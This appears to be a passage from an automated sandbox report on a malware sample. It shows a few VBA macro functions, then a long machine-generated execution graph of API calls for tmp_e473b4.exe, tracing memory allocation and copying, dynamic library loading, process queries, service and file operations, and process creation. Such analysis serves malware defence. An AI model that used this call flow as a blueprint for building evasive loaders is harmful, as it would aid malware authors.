                                                                              APIsMeta Information

                                                                              SaveAs2

                                                                              wdFormatText

                                                                              LineInstructionMeta Information
                                                                              37

                                                                              Private Function SaveAs3(Formt as String)

                                                                              38

                                                                              ActiveDocument.SaveAs2 FileName := STP + "." + Formt, FileFormat := wdFormatText

                                                                              SaveAs2

                                                                              wdFormatText

                                                                              executed
                                                                              39

                                                                              End Function

                                                                              Non-Executed Functions
                                                                              Function Button_Click3, APIs: 3, Strings: 0, Number of lines: 3, Relevance: 3.753
                                                                              APIsMeta Information

                                                                              Right

                                                                              Text

                                                                              Range

                                                                              LineInstructionMeta Information
                                                                              34

                                                                              Private Function Button_Click3(One as Long) as String

                                                                              35

                                                                              Button_Click3 = Right(Range.Text, One)

                                                                              Right

                                                                              Text

                                                                              Range

                                                                              36

                                                                              End Function

                                                                              Reset < >

                                                                                Analysis Process: tmp_e473b4.exe PID: 1840 Parent PID: 3024 tmp_e473b4.exeCOMMON

                                                                                Execution Graph

                                                                                Execution Coverage:9%
                                                                                Dynamic/Decrypted Code Coverage:81.7%
                                                                                Signature Coverage:9.7%
                                                                                Total number of Nodes:1184
                                                                                Total number of Limit Nodes:56

                                                                                Graph

                                                                                execution_graph 10897 7a4b70 10898 7a4b98 10897->10898 10899 7a4b82 10897->10899 10902 7a4bd7 CreateProcessW 10898->10902 10904 7a3f00 GetPEB 10898->10904 10900 7a3f00 GetPEB 10899->10900 10901 7a4b8c 10900->10901 10903 7a3e60 GetPEB 10901->10903 10905 7a4c73 10902->10905 10906 7a4bf7 10902->10906 10903->10898 10907 7a4bc6 10904->10907 10908 7a4bff 10906->10908 10910 7a4c33 10906->10910 10912 7a3f00 GetPEB 10906->10912 10909 7a3e60 GetPEB 10907->10909 10911 7a4bd2 10909->10911 10915 7a4c5d 10910->10915 10916 7a3f00 GetPEB 10910->10916 10911->10902 10913 7a4c27 10912->10913 10914 7a3e60 GetPEB 10913->10914 10914->10910 10917 7a4c51 10916->10917 10918 7a3e60 GetPEB 10917->10918 10918->10915 9873 620170 9874 6201fb 9873->9874 9889 620ad0 9874->9889 9880 6202c4 9926 6206f0 9880->9926 9882 6202d0 9943 6208f0 9882->9943 9884 6202dc 9961 620580 9884->9961 9886 6202e8 9887 6202ef VirtualFree 9886->9887 9888 6202fb 9886->9888 9887->9888 9891 620b2f 9889->9891 9890 6202ab 9895 620d60 9890->9895 9891->9890 9892 620bf0 VirtualAlloc 9891->9892 9893 620c1c 9892->9893 9893->9890 9894 620cdb VirtualAlloc 9893->9894 9894->9890 9896 620d94 9895->9896 9897 620da3 VirtualAlloc RtlMoveMemory 9896->9897 9898 6202b8 9897->9898 9904 620ddb 9897->9904 9905 620400 GetCurrentProcess 9898->9905 9900 620e0d RtlMoveMemory 9900->9904 9901 620e3c VirtualAlloc 9901->9904 9902 620e6a RtlMoveMemory 9902->9898 9902->9904 9903 620e91 RtlFillMemory 9903->9898 9903->9904 9904->9898 9904->9901 9904->9902 9904->9903 9969 621140 lstrcpynW 9904->9969 9970 621140 lstrcpynW 9905->9970 9907 620459 NtQueryInformationProcess 9908 6204c5 9907->9908 9909 62046f 9907->9909 9913 6204e5 9908->9913 9976 621140 lstrcpynW 9908->9976 9910 620575 9909->9910 9911 620492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 9909->9911 9912 620484 GetProcessHeap HeapFree 9909->9912 9911->9908 9911->9909 9912->9911 9971 621140 lstrcpynW 9913->9971 9916 6204dc RtlMoveMemory 9916->9913 9917 6204ef RtlMoveMemory 9972 621140 lstrcpynW 9917->9972 9919 620511 RtlMoveMemory 9973 621140 lstrcpynW 9919->9973 9921 620528 RtlMoveMemory 9974 621140 lstrcpynW 9921->9974 9923 62053f RtlMoveMemory 9975 621140 lstrcpynW 9923->9975 9925 62055a RtlMoveMemory 9925->9880 9927 620740 9926->9927 9929 620744 9927->9929 9977 620fb0 9927->9977 9929->9882 9931 6207b5 RtlMoveMemory 9932 620770 9931->9932 9932->9929 9933 6207ff LoadLibraryA 9932->9933 9985 621140 lstrcpynW 9932->9985 9934 6208b9 9933->9934 9941 62080f 9933->9941 9934->9882 9936 62082d RtlMoveMemory 9936->9932 9936->9941 9937 620858 GetProcAddress 9937->9929 9937->9941 9939 620872 RtlMoveMemory 9988 621140 lstrcpynW 9939->9988 9941->9929 9941->9932 9941->9937 9942 620890 RtlMoveMemory 9941->9942 9986 621140 lstrcpynW 9941->9986 9987 621140 lstrcpynW 9941->9987 9942->9929 9942->9941 9944 620934 9943->9944 9945 620fb0 2 API calls 9944->9945 9946 620938 9944->9946 9947 620970 9945->9947 9946->9884 9947->9946 9991 621140 lstrcpynW 9947->9991 9949 6209af RtlMoveMemory 9949->9946 9955 6209c2 9949->9955 9952 6209f6 RtlMoveMemory 9952->9955 9953 620a97 RtlMoveMemory 9954 620aac 9953->9954 9953->9955 9954->9884 9955->9946 9992 621140 lstrcpynW 9955->9992 9993 621140 lstrcpynW 9955->9993 9995 621140 lstrcpynW 9955->9995 9957 620a3e RtlMoveMemory 9957->9946 9958 620a57 9957->9958 9994 621140 lstrcpynW 9958->9994 9960 620a61 RtlMoveMemory 9960->9955 9965 6205bc 9961->9965 9962 6205c0 9962->9886 9964 620617 RtlMoveMemory 9964->9965 9965->9962 9967 62069b VirtualProtect 9965->9967 9996 621140 lstrcpynW 9965->9996 9997 621140 lstrcpynW 9965->9997 9967->9965 9968 6206c6 9967->9968 9968->9886 9969->9900 9970->9907 9971->9917 9972->9919 9973->9921 9974->9923 9975->9925 9976->9916 9979 620fda 9977->9979 9978 62104a 9978->9932 9979->9978 9989 621140 lstrcpynW 9979->9989 9981 621001 9990 621140 lstrcpynW 9981->9990 9983 62101b RtlMoveMemory 9984 621029 9983->9984 9984->9932 9985->9931 9986->9936 9987->9939 9988->9941 9989->9981 9990->9983 9991->9949 9992->9952 9993->9957 9994->9960 9995->9953 9996->9964 9997->9965 9998 402064 #100 9999 402072 9998->9999 11140 418030 11141 418067 11140->11141 11142 418099 11141->11142 11143 418079 __vbaI4Var 11141->11143 11146 4180c8 __vbaHresultCheckObj 11142->11146 11147 4180da __vbaFreeVar 11142->11147 11148 40f5dc 11143->11148 11146->11147 11149 40f5e5 11148->11149 10000 7a5ce0 10008 7a65e0 10000->10008 10002 7a5ce5 10003 7a5d09 ExitProcess 10002->10003 10054 7a3f00 GetPEB 10002->10054 10007 7a5d04 10007->10003 10012 7a65fd 10008->10012 10010 7a6dcd 10340 7ab2e0 10010->10340 10012->10010 10013 7a6927 10012->10013 10015 7a706e 10012->10015 10017 7a68df 10012->10017 10022 7a7061 10012->10022 10037 7a4220 GetPEB 10012->10037 10042 7a3f00 GetPEB 10012->10042 10052 7a3e60 GetPEB 10012->10052 10053 7a4160 GetPEB 10012->10053 10070 7a8400 10012->10070 10076 7a7120 10012->10076 10097 7a8970 10012->10097 10109 7a80a0 10012->10109 10121 7a9860 10012->10121 10137 7a9620 10012->10137 10146 7a12b0 10012->10146 10168 7aafe0 10012->10168 10173 7a8700 10012->10173 10179 7a6060 10012->10179 10200 7ab430 10012->10200 10207 7a9f30 10012->10207 10216 7a61e0 10012->10216 10228 7a94d0 10012->10228 10235 7a8e80 10012->10235 10244 7a3310 10012->10244 10254 7a1840 10012->10254 10269 7a3460 10012->10269 10279 7a53d0 10012->10279 10284 7a9270 10012->10284 10294 7a8bb0 10012->10294 10304 7a72d0 10012->10304 10314 7a9050 10012->10314 10328 7a4770 10012->10328 10345 7ab1d0 10012->10345 10350 7a7410 10012->10350 10029 7a6f27 GetTickCount 10013->10029 10038 7a3e60 GetPEB 10013->10038 10043 7a3f00 GetPEB 10013->10043 10047 7a6975 GetTickCount 10013->10047 10365 7a8740 10015->10365 10017->10002 10356 7a8d40 10022->10356 10026 7a7073 10026->10002 10029->10012 10034 7a7066 10034->10002 10037->10012 10038->10013 10042->10012 10043->10013 10047->10012 10052->10012 10053->10012 10055 7a3f25 10054->10055 10056 7a3e60 10055->10056 10057 7a3ebc 10056->10057 10058 7a3e9c 10056->10058 10057->10007 10058->10057 10059 7a3f00 GetPEB 10058->10059 10062 7a40f5 10058->10062 10060 7a40e9 10059->10060 10061 7a3e60 GetPEB 10060->10061 10061->10062 10063 7a3f00 GetPEB 10062->10063 10069 7a4126 10062->10069 10064 7a411a 10063->10064 10067 7a3e60 GetPEB 10064->10067 10065 7a3e60 GetPEB 10066 7a4157 10065->10066 10066->10007 10067->10069 10068 7a4138 10068->10007 10069->10065 10069->10068 10071 7a84e3 10070->10071 10072 7a8600 CreateFileW 10071->10072 10073 7a85bd 10071->10073 10074 7a3e60 GetPEB 10071->10074 10075 7a3f00 GetPEB 10071->10075 10072->10071 10072->10073 10073->10012 10074->10071 10075->10071 10078 7a7125 10076->10078 10077 7a7233 10383 7a34c0 10077->10383 10078->10077 10080 7a7232 10078->10080 10087 7a7080 GetPEB LoadLibraryW 10078->10087 10080->10012 10082 7a7265 LoadLibraryW 10084 7a727a 10082->10084 10085 7a7290 10082->10085 10083 7a3f00 GetPEB 10088 7a7254 10083->10088 10086 7a3f00 GetPEB 10084->10086 10092 7a72b8 10085->10092 10094 7a3f00 GetPEB 10085->10094 10089 7a7284 10086->10089 10087->10078 10090 7a3e60 GetPEB 10088->10090 10091 7a3e60 GetPEB 10089->10091 10093 7a7260 10090->10093 10091->10085 10092->10012 10093->10082 10095 7a72ac 10094->10095 10096 7a3e60 GetPEB 10095->10096 10096->10092 10098 7a8991 10097->10098 10099 7a3f00 GetPEB 10098->10099 10100 7a34c0 GetPEB 10098->10100 10101 7a8b74 10098->10101 10103 7a3e60 GetPEB 10098->10103 10105 7a8add 10098->10105 10108 7a3460 GetPEB 10098->10108 10393 7a5040 10098->10393 10099->10098 10100->10098 10104 7a3f00 GetPEB 10101->10104 10101->10105 10103->10098 10106 7a8b87 10104->10106 10105->10012 10107 7a3e60 GetPEB 10106->10107 10107->10105 10108->10098 10115 7a8163 10109->10115 10110 7a34c0 GetPEB 10110->10115 10111 7a8397 CreateFileW 10111->10115 10120 7a83e6 10111->10120 10112 7a83c7 10116 7a3f00 GetPEB 10112->10116 10112->10120 10113 7a3f00 GetPEB 10113->10115 10114 7a8358 10114->10012 10115->10110 10115->10111 10115->10112 10115->10113 10115->10114 10119 7a3e60 GetPEB 10115->10119 10117 7a83da 10116->10117 10118 7a3e60 GetPEB 10117->10118 10118->10120 10119->10115 10120->10012 10136 7a9880 10121->10136 10122 7a99b2 OpenSCManagerW 10122->10136 10123 7a9b02 10124 7a9b26 SHGetFolderPathW 10123->10124 10129 7a3f00 GetPEB 10123->10129 10419 7a3040 10124->10419 10125 7a9a66 CloseServiceHandle 10125->10136 10128 7a9969 SHGetFolderPathW 10128->10136 10130 7a9b15 10129->10130 10133 7a3e60 GetPEB 10130->10133 10131 7a9af5 10131->10012 10132 7a3f00 GetPEB 10132->10136 10134 7a9b21 10133->10134 10134->10124 10135 7a3e60 GetPEB 10135->10136 10136->10122 10136->10123 10136->10125 10136->10128 10136->10131 10136->10132 10136->10135 10424 7a7c60 10136->10424 10144 7a9630 10137->10144 10138 7a34c0 GetPEB 10138->10144 10139 7a981f 10139->10012 10140 7a9829 10448 7a3780 10140->10448 10142 7a9839 10142->10012 10143 7a3f00 GetPEB 10143->10144 10144->10138 10144->10139 10144->10140 10144->10143 10145 7a3e60 GetPEB 10144->10145 10145->10144 10150 7a12e1 10146->10150 10148 7a181c 10577 7a4220 10148->10577 10150->10148 10151 7a3f00 GetPEB 10150->10151 10153 7a1823 10150->10153 10155 7a17d1 10150->10155 10156 7a34c0 GetPEB 10150->10156 10157 7a4220 GetPEB 10150->10157 10160 7a42c0 GetPEB 10150->10160 10162 7a1641 _snwprintf 10150->10162 10166 7a3e60 GetPEB 10150->10166 10167 7a3460 GetPEB 10150->10167 10475 7a1fc0 10150->10475 10483 7a1e70 10150->10483 10492 7a5c00 10150->10492 10511 7a1c70 10150->10511 10527 7a2230 10150->10527 10535 7a2be0 10150->10535 10550 7a4ea0 10150->10550 10555 7a1900 10150->10555 10151->10150 10153->10012 10155->10012 10156->10150 10157->10150 10160->10150 10164 7a3460 GetPEB 10162->10164 10164->10150 10166->10150 10167->10150 10169 7ab101 10168->10169 10172 7aaff8 10168->10172 10169->10012 10170 7a3e60 GetPEB 10170->10172 10171 7a3f00 GetPEB 10171->10172 10172->10169 10172->10170 10172->10171 10174 7a8709 10173->10174 10175 7a871f 10173->10175 10176 7a3f00 GetPEB 10174->10176 10175->10012 10177 7a8713 10176->10177 10178 7a3e60 GetPEB 10177->10178 10178->10175 10619 7a5500 10179->10619 10181 7a6134 10181->10012 10182 7a613c 10183 7a35c0 GetPEB 10182->10183 10185 7a6147 10183->10185 10184 7a3f00 GetPEB 10186 7a6074 10184->10186 10188 7a3f00 GetPEB 10185->10188 10192 7a6168 10185->10192 10186->10181 10186->10182 10186->10184 10187 7a3e60 GetPEB 10186->10187 10187->10186 10189 7a615c 10188->10189 10190 7a3e60 GetPEB 10189->10190 10190->10192 10191 7a61a2 10196 7a61ca 10191->10196 10197 7a3f00 GetPEB 10191->10197 10192->10191 10193 7a3f00 GetPEB 10192->10193 10194 7a6196 10193->10194 10195 7a3e60 GetPEB 10194->10195 10195->10191 10196->10012 10198 7a61be 10197->10198 10199 7a3e60 GetPEB 10198->10199 10199->10196 10202 7ab440 10200->10202 10201 7ab4ba 10201->10012 10202->10201 10629 7aab50 10202->10629 10645 7aa170 10202->10645 10666 7aa7a0 10202->10666 10686 7aa5e0 10202->10686 10212 7a9f40 10207->10212 10208 7aa01b 10210 7a9f64 10208->10210 10211 7a3f00 GetPEB 10208->10211 10209 7a3f00 GetPEB 10209->10212 10210->10012 10213 7aa02e 10211->10213 10212->10208 10212->10209 10212->10210 10215 7a3e60 GetPEB 10212->10215 10214 7a3e60 GetPEB 10213->10214 10214->10210 10215->10212 10224 7a6202 10216->10224 10218 7a42c0 GetPEB 10218->10224 10220 7a624b 10220->10012 10221 7a3f00 GetPEB 10221->10224 10222 7a6490 10222->10012 10223 7a3f00 GetPEB 10227 7a642d 10223->10227 10224->10218 10224->10220 10224->10221 10226 7a3e60 GetPEB 10224->10226 10224->10227 10800 7a55b0 10224->10800 10809 7a4c80 10224->10809 10225 7a3e60 GetPEB 10225->10227 10226->10224 10227->10222 10227->10223 10227->10225 10231 7a94f0 10228->10231 10229 7a95c2 10229->10012 10231->10229 10232 7a3f00 GetPEB 10231->10232 10233 7a4c80 GetPEB 10231->10233 10234 7a3e60 GetPEB 10231->10234 10818 7a46c0 10231->10818 10232->10231 10233->10231 10234->10231 10236 7a8ea0 10235->10236 10237 7a901b 10236->10237 10239 7a3f00 GetPEB 10236->10239 10241 7a8fc6 10236->10241 10243 7a3e60 GetPEB 10236->10243 10238 7a3f00 GetPEB 10237->10238 10237->10241 10240 7a902e 10238->10240 10239->10236 10242 7a3e60 GetPEB 10240->10242 10241->10012 10242->10241 10243->10236 10245 7a334a 10244->10245 10246 7a336f 10245->10246 10247 7a3f00 GetPEB 10245->10247 10250 7a3f00 GetPEB 10246->10250 10253 7a3397 10246->10253 10248 7a3363 10247->10248 10249 7a3e60 GetPEB 10248->10249 10249->10246 10251 7a338b 10250->10251 10252 7a3e60 GetPEB 10251->10252 10252->10253 10253->10012 10255 7a184c 10254->10255 10256 7a1862 10254->10256 10257 7a3f00 GetPEB 10255->10257 10260 7a3f00 GetPEB 10256->10260 10264 7a188b 10256->10264 10258 7a1856 10257->10258 10259 7a3e60 GetPEB 10258->10259 10259->10256 10261 7a187f 10260->10261 10262 7a3e60 GetPEB 10261->10262 10262->10264 10263 7a18ee 10263->10012 10264->10263 10264->10264 10833 7a25e0 10264->10833 10266 7a18d8 10267 7a18dc 10266->10267 10268 7a4220 GetPEB 10266->10268 10267->10012 10268->10263 10270 7a3483 10269->10270 10271 7a346d 10269->10271 10275 7a3f00 GetPEB 10270->10275 10278 7a34ab 10270->10278 10272 7a3f00 GetPEB 10271->10272 10273 7a3477 10272->10273 10274 7a3e60 GetPEB 10273->10274 10274->10270 10276 7a349f 10275->10276 10277 7a3e60 GetPEB 10276->10277 10277->10278 10278->10012 10282 7a53e0 10279->10282 10280 7a3f00 GetPEB 10280->10282 10281 7a54b4 10281->10012 10282->10280 10282->10281 10283 7a3e60 GetPEB 10282->10283 10283->10282 10293 7a9290 10284->10293 10286 7a949c 10287 7a3f00 GetPEB 10286->10287 10292 7a9410 10286->10292 10288 7a94af 10287->10288 10289 7a3e60 GetPEB 10288->10289 10289->10292 10290 7a3f00 GetPEB 10290->10293 10291 7a3e60 GetPEB 10291->10293 10292->10012 10293->10286 10293->10290 10293->10291 10293->10292 10848 7a1000 10293->10848 10295 7a8bc4 10294->10295 10296 7a8d1d 10295->10296 10297 7a3780 2 API calls 10295->10297 10299 7a8d10 10295->10299 10301 7a34c0 GetPEB 10295->10301 10302 7a3f00 GetPEB 10295->10302 10303 7a3e60 GetPEB 10295->10303 10857 7a36b0 10296->10857 10297->10295 10299->10012 10301->10295 10302->10295 10303->10295 10305 7a72d9 10304->10305 10306 7a72ef 10304->10306 10307 7a3f00 GetPEB 10305->10307 10310 7a3f00 GetPEB 10306->10310 10313 7a7318 10306->10313 10308 7a72e3 10307->10308 10309 7a3e60 GetPEB 10308->10309 10309->10306 10311 7a730c 10310->10311 10312 7a3e60 GetPEB 10311->10312 10312->10313 10313->10012 10327 7a9070 10314->10327 10315 7a91e4 10317 7a921f 10315->10317 10318 7a3f00 GetPEB 10315->10318 10316 7a91de 10316->10012 10322 7a9247 10317->10322 10324 7a3f00 GetPEB 10317->10324 10320 7a9213 10318->10320 10319 7a3f00 GetPEB 10319->10327 10323 7a3e60 GetPEB 10320->10323 10321 7a3e60 GetPEB 10321->10327 10322->10012 10323->10317 10325 7a923b 10324->10325 10326 7a3e60 GetPEB 10325->10326 10326->10322 10327->10315 10327->10316 10327->10319 10327->10321 10329 7a4785 10328->10329 10337 7a479b 10328->10337 10331 7a3f00 GetPEB 10329->10331 10330 7a47cb GetCurrentProcessId 10336 7a47d5 10330->10336 10333 7a478f 10331->10333 10332 7a3f00 GetPEB 10335 7a47b7 10332->10335 10334 7a3e60 GetPEB 10333->10334 10334->10337 10338 7a3e60 GetPEB 10335->10338 10336->10012 10337->10330 10337->10332 10339 7a47c3 10338->10339 10339->10330 10341 7ab2ec 10340->10341 10342 7ab422 10341->10342 10343 7a3f00 GetPEB 10341->10343 10344 7a3e60 GetPEB 10341->10344 10342->10017 10343->10341 10344->10341 10348 7ab1e0 10345->10348 10346 7ab2b2 10346->10012 10347 7a3f00 GetPEB 10347->10348 10348->10346 10348->10347 10349 7a3e60 GetPEB 10348->10349 10349->10348 10352 7a7420 10350->10352 10351 7a7608 10351->10012 10352->10351 10353 7a3f00 GetPEB 10352->10353 10354 7a3e60 GetPEB 10352->10354 10355 7a4fd0 GetPEB 10352->10355 10353->10352 10354->10352 10355->10352 10364 7a8d50 10356->10364 10357 7a8e3f 10358 7a4b70 2 API calls 10357->10358 10359 7a8e4f 10358->10359 10359->10034 10360 7a34c0 GetPEB 10360->10364 10361 7a8e29 10361->10034 10362 7a3f00 GetPEB 10362->10364 10363 7a3e60 GetPEB 10363->10364 10364->10357 10364->10360 10364->10361 10364->10362 10364->10363 10381 7a8753 10365->10381 10366 7a34c0 GetPEB 10366->10381 10368 7a88df 10368->10026 10369 7a8903 10371 7a8922 10369->10371 10372 7a3f00 GetPEB 10369->10372 10370 7a3f00 GetPEB 10370->10381 10376 7a8955 10371->10376 10377 7a3f00 GetPEB 10371->10377 10374 7a8916 10372->10374 10373 7a8e80 GetPEB 10373->10381 10375 7a3e60 GetPEB 10374->10375 10375->10371 10376->10026 10379 7a8949 10377->10379 10378 7a3780 2 API calls 10378->10381 10380 7a3e60 GetPEB 10379->10380 10380->10376 10381->10366 10381->10368 10381->10369 10381->10370 10381->10373 10381->10378 10382 7a3e60 GetPEB 10381->10382 10876 7a7700 10381->10876 10382->10381 10385 7a34e3 10383->10385 10384 7a3508 10389 7a3f00 GetPEB 10384->10389 10392 7a3530 10384->10392 10385->10384 10386 7a3f00 GetPEB 10385->10386 10387 7a34fc 10386->10387 10388 7a3e60 GetPEB 10387->10388 10388->10384 10390 7a3524 10389->10390 10391 7a3e60 GetPEB 10390->10391 10391->10392 10392->10082 10392->10083 10408 7a505c 10393->10408 10394 7a5367 10395 7a5386 10394->10395 10397 7a3f00 GetPEB 10394->10397 10396 7a53ae 10395->10396 10404 7a3f00 GetPEB 10395->10404 10396->10098 10398 7a537a 10397->10398 10399 7a3e60 GetPEB 10398->10399 10399->10395 10400 7a3f00 GetPEB 10400->10408 10401 7a5131 OpenServiceW 10401->10408 10402 7a534d RtlAllocateHeap 10402->10396 10402->10408 10405 7a53a2 10404->10405 10406 7a3e60 GetPEB 10405->10406 10406->10396 10407 7a3e60 GetPEB 10407->10408 10408->10394 10408->10396 10408->10400 10408->10401 10408->10402 10408->10407 10409 7a42c0 10408->10409 10410 7a42e3 10409->10410 10411 7a42cd 10409->10411 10415 7a3f00 GetPEB 10410->10415 10417 7a430b 10410->10417 10412 7a3f00 GetPEB 10411->10412 10413 7a42d7 10412->10413 10414 7a3e60 GetPEB 10413->10414 10414->10410 10416 7a42ff 10415->10416 10418 7a3e60 GetPEB 10416->10418 10417->10408 10418->10417 10420 7a3050 10419->10420 10422 7a307a 10420->10422 10434 7a38f0 10420->10434 10422->10131 10423 7a3092 10423->10131 10430 7a7c80 10424->10430 10425 7a7d97 10425->10136 10426 7a7ddd 10429 7a3f00 GetPEB 10426->10429 10433 7a7dfd 10426->10433 10427 7a3f00 GetPEB 10427->10430 10428 7a3e60 GetPEB 10428->10430 10431 7a7df1 10429->10431 10430->10425 10430->10426 10430->10427 10430->10428 10432 7a3e60 GetPEB 10431->10432 10432->10433 10433->10136 10446 7a3910 10434->10446 10435 7a3a3b FindFirstFileW 10438 7a3b8f 10435->10438 10435->10446 10436 7a3ac1 10436->10423 10437 7a3b70 10437->10438 10439 7a3f00 GetPEB 10437->10439 10438->10423 10441 7a3b83 10439->10441 10440 7a3e60 GetPEB 10440->10446 10442 7a3e60 GetPEB 10441->10442 10442->10438 10443 7a34c0 GetPEB 10443->10446 10444 7a3f00 GetPEB 10444->10446 10445 7a38f0 GetPEB 10445->10446 10446->10435 10446->10436 10446->10437 10446->10440 10446->10443 10446->10444 10446->10445 10447 7a3460 GetPEB 10446->10447 10447->10446 10449 7a3795 10448->10449 10452 7a37ab 10448->10452 10450 7a3f00 GetPEB 10449->10450 10451 7a379f 10450->10451 10453 7a3e60 GetPEB 10451->10453 10454 7a37dd 10452->10454 10455 7a3f00 GetPEB 10452->10455 10453->10452 10457 7a3812 10454->10457 10459 7a3f00 GetPEB 10454->10459 10456 7a37d1 10455->10456 10458 7a3e60 GetPEB 10456->10458 10462 7a384a 10457->10462 10463 7a3f00 GetPEB 10457->10463 10458->10454 10460 7a3806 10459->10460 10461 7a3e60 GetPEB 10460->10461 10461->10457 10465 7a3876 10462->10465 10467 7a3f00 GetPEB 10462->10467 10464 7a383e 10463->10464 10466 7a3e60 GetPEB 10464->10466 10470 7a38d1 SHFileOperationW 10465->10470 10471 7a3f00 GetPEB 10465->10471 10466->10462 10468 7a386a 10467->10468 10469 7a3e60 GetPEB 10468->10469 10469->10465 10470->10142 10472 7a38c0 10471->10472 10473 7a3e60 GetPEB 10472->10473 10474 7a38cc 10473->10474 10474->10470 10482 7a1fd2 10475->10482 10476 7a2212 10477 7a2208 10476->10477 10479 7a4220 GetPEB 10476->10479 10477->10150 10478 7a42c0 GetPEB 10478->10482 10479->10477 10480 7a3f00 GetPEB 10480->10482 10481 7a3e60 GetPEB 10481->10482 10482->10476 10482->10477 10482->10478 10482->10480 10482->10481 10490 7a1e86 10483->10490 10484 7a1f77 10485 7a1f68 10484->10485 10486 7a3f00 GetPEB 10484->10486 10485->10150 10487 7a1f98 10486->10487 10488 7a3e60 GetPEB 10487->10488 10488->10485 10489 7a3f00 GetPEB 10489->10490 10490->10484 10490->10485 10490->10489 10491 7a3e60 GetPEB 10490->10491 10491->10490 10493 7a5c26 10492->10493 10494 7a5c10 10492->10494 10498 7a3f00 GetPEB 10493->10498 10502 7a5c4e 10493->10502 10495 7a3f00 GetPEB 10494->10495 10496 7a5c1a 10495->10496 10497 7a3e60 GetPEB 10496->10497 10497->10493 10499 7a5c42 10498->10499 10501 7a3e60 GetPEB 10499->10501 10500 7a5cd2 10500->10150 10501->10502 10502->10500 10503 7a5c99 10502->10503 10504 7a3f00 GetPEB 10502->10504 10507 7a5cc1 10503->10507 10508 7a3f00 GetPEB 10503->10508 10505 7a5c8d 10504->10505 10506 7a3e60 GetPEB 10505->10506 10506->10503 10507->10150 10509 7a5cb5 10508->10509 10510 7a3e60 GetPEB 10509->10510 10510->10507 10512 7a1d06 10511->10512 10513 7a1cf0 10511->10513 10517 7a3f00 GetPEB 10512->10517 10520 7a1dad 10512->10520 10514 7a3f00 GetPEB 10513->10514 10515 7a1cfa 10514->10515 10516 7a3e60 GetPEB 10515->10516 10516->10512 10518 7a1da1 10517->10518 10519 7a3e60 GetPEB 10518->10519 10519->10520 10521 7a3f00 GetPEB 10520->10521 10523 7a1de1 10520->10523 10522 7a1dd5 10521->10522 10524 7a3e60 GetPEB 10522->10524 10525 7a4ea0 GetPEB 10523->10525 10524->10523 10526 7a1e15 10525->10526 10526->10150 10533 7a2255 10527->10533 10528 7a229c 10528->10150 10529 7a3f00 GetPEB 10529->10533 10530 7a25be 10531 7a25cd 10530->10531 10532 7a4220 GetPEB 10530->10532 10531->10150 10532->10531 10533->10528 10533->10529 10533->10530 10534 7a3e60 GetPEB 10533->10534 10534->10533 10546 7a2c1a 10535->10546 10537 7a2fcf 10539 7a2fee 10537->10539 10540 7a3f00 GetPEB 10537->10540 10538 7a2cae 10538->10150 10539->10150 10543 7a2fe2 10540->10543 10541 7a3f00 GetPEB 10541->10546 10542 7a34c0 GetPEB 10542->10546 10544 7a3e60 GetPEB 10543->10544 10544->10539 10545 7a3e60 GetPEB 10545->10546 10546->10537 10546->10538 10546->10541 10546->10542 10546->10545 10547 7a4220 GetPEB 10546->10547 10548 7a3460 GetPEB 10546->10548 10587 7a56f0 10546->10587 10596 7a2980 10546->10596 10547->10546 10548->10546 10553 7a4eb6 10550->10553 10551 7a4f3d 10551->10150 10552 7a3f00 GetPEB 10552->10553 10553->10551 10553->10552 10554 7a3e60 GetPEB 10553->10554 10554->10553 10575 7a191f 10555->10575 10556 7a1bc6 10557 7a35c0 GetPEB 10556->10557 10559 7a1bd0 10557->10559 10558 7a1ba4 10558->10150 10560 7a1bf1 10559->10560 10561 7a3f00 GetPEB 10559->10561 10565 7a1c23 10560->10565 10567 7a3f00 GetPEB 10560->10567 10563 7a1be5 10561->10563 10562 7a3e60 GetPEB 10562->10575 10566 7a3e60 GetPEB 10563->10566 10564 7a4e30 GetPEB 10564->10575 10570 7a1c4b 10565->10570 10571 7a3f00 GetPEB 10565->10571 10566->10560 10568 7a1c17 10567->10568 10569 7a3e60 GetPEB 10568->10569 10569->10565 10570->10150 10572 7a1c3f 10571->10572 10573 7a3e60 GetPEB 10572->10573 10573->10570 10575->10556 10575->10558 10575->10562 10575->10564 10576 7a3f00 GetPEB 10575->10576 10609 7a35c0 10575->10609 10576->10575 10578 7a422d 10577->10578 10583 7a4243 10577->10583 10579 7a3f00 GetPEB 10578->10579 10580 7a4237 10579->10580 10581 7a3e60 GetPEB 10580->10581 10581->10583 10582 7a3f00 GetPEB 10584 7a425f 10582->10584 10583->10582 10585 7a426b 10583->10585 10586 7a3e60 GetPEB 10584->10586 10585->10153 10586->10585 10588 7a5701 10587->10588 10589 7a5723 10588->10589 10590 7a57e3 10588->10590 10591 7a3f00 GetPEB 10588->10591 10595 7a3e60 GetPEB 10588->10595 10589->10546 10590->10589 10592 7a3f00 GetPEB 10590->10592 10591->10588 10593 7a57f6 10592->10593 10594 7a3e60 GetPEB 10593->10594 10594->10589 10595->10588 10598 7a29a0 10596->10598 10597 7a2abf 10600 7a3f00 GetPEB 10597->10600 10603 7a2ae4 10597->10603 10605 7a2b0c 10597->10605 10598->10597 10599 7a3e60 GetPEB 10598->10599 10602 7a3f00 GetPEB 10598->10602 10599->10598 10601 7a2ad8 10600->10601 10604 7a3e60 GetPEB 10601->10604 10602->10598 10603->10605 10606 7a3f00 GetPEB 10603->10606 10604->10603 10605->10546 10607 7a2b00 10606->10607 10608 7a3e60 GetPEB 10607->10608 10608->10605 10610 7a35e4 10609->10610 10611 7a3609 10610->10611 10612 7a3f00 GetPEB 10610->10612 10615 7a3f00 GetPEB 10611->10615 10617 7a3631 10611->10617 10613 7a35fd 10612->10613 10614 7a3e60 GetPEB 10613->10614 10614->10611 10616 7a3625 10615->10616 10618 7a3e60 GetPEB 10616->10618 10617->10575 10618->10617 10620 7a5516 10619->10620 10625 7a552c 10619->10625 10621 7a3f00 GetPEB 10620->10621 10622 7a5520 10621->10622 10624 7a3e60 GetPEB 10622->10624 10623 7a5586 10623->10186 10624->10625 10625->10623 10626 7a3f00 GetPEB 10625->10626 10627 7a557a 10626->10627 10628 7a3e60 GetPEB 10627->10628 10628->10623 10635 7aab66 10629->10635 10632 7aab8c 10632->10202 10633 7aac52 10634 7aac71 10633->10634 10636 7a3f00 GetPEB 10633->10636 10640 7a3f00 GetPEB 10634->10640 10643 7aac99 10634->10643 10635->10632 10635->10633 10639 7a3f00 GetPEB 10635->10639 10641 7a3e60 GetPEB 10635->10641 10702 7a4b70 10635->10702 10724 7aacd0 10635->10724 10637 7aac65 10636->10637 10638 7a3e60 GetPEB 10637->10638 10638->10634 10639->10635 10642 7aac8d 10640->10642 10641->10635 10644 7a3e60 GetPEB 10642->10644 10643->10202 